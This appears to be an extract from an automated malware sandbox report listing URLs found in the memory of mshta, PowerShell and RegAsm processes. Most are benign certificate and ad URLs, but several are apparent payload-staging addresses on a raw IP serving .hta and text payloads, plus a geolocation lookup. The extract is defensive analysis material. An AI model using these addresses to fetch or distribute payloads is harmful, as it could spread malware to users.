                    Source: mshta.exe, 00000004.00000002.442847727.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/
                    Source: mshta.exe, 00000004.00000002.442847727.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/$
                    Source: powershell.exe, 0000000E.00000002.473005129.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000026A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/RRCGGH.txt
                    Source: mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488616620.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta
                    Source: mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta3
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.hta=3
                    Source: mshta.exe, 0000000F.00000003.475518596.00000000039E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473077604.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487910407.00000000039E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488694148.00000000039E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaC:
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaP3
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaY3
                    Source: mshta.exe, 0000000F.00000003.487881018.0000000003955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488616620.0000000003955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaes
                    Source: mshta.exe, 00000004.00000003.438838908.00000000026B5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.437632636.00000000026B5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475500690.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487438890.0000000002F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htahttp://192.3.220.40/330/uh/newthingtobeonlinefor
                    Source: mshta.exe, 0000000F.00000002.488297453.000000000026A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaks
                    Source: mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htaw
                    Source: mshta.exe, 0000000F.00000003.487926229.00000000002DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/uh/newthingtobeonlinefor.htazzC:
                    Source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/verybest
                    Source: powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIF
                    Source: powershell.exe, 00000014.00000002.509594544.000000001AAA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIF/
                    Source: powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIF7
                    Source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40/330/verybestthingswesharedfornew.tIFp
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                    Source: mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C100000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C386000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 
0000001D.00000002.593504050.000000001AB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: powershell.exe, 0000001D.00000002.593504050.000000001ABBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entr
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452480910.0000000000272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.538004187.000000001AD53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.509594544.000000001AA98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001AB81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverhei
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru4
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                    Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: RegAsm.exe, 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpO
                    Source: RegAsm.exe, 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy
                    Source: powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.493138621.0000000000538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
                    Source: powershell.exe, 00000007.00000002.453491405.0000000002910000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473005129.00000000036FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C2A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C100000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488297453.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473378608.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487926229.00000000002A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C386000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001AB50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452480910.0000000000272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001ABBC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                    Source: powershell.exe, 00000007.00000002.453491405.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.553505468.000000000239F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473005129.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.494874589.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.598837287.000000000255B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000022F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                    Source: bhv8392.tmp.21.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
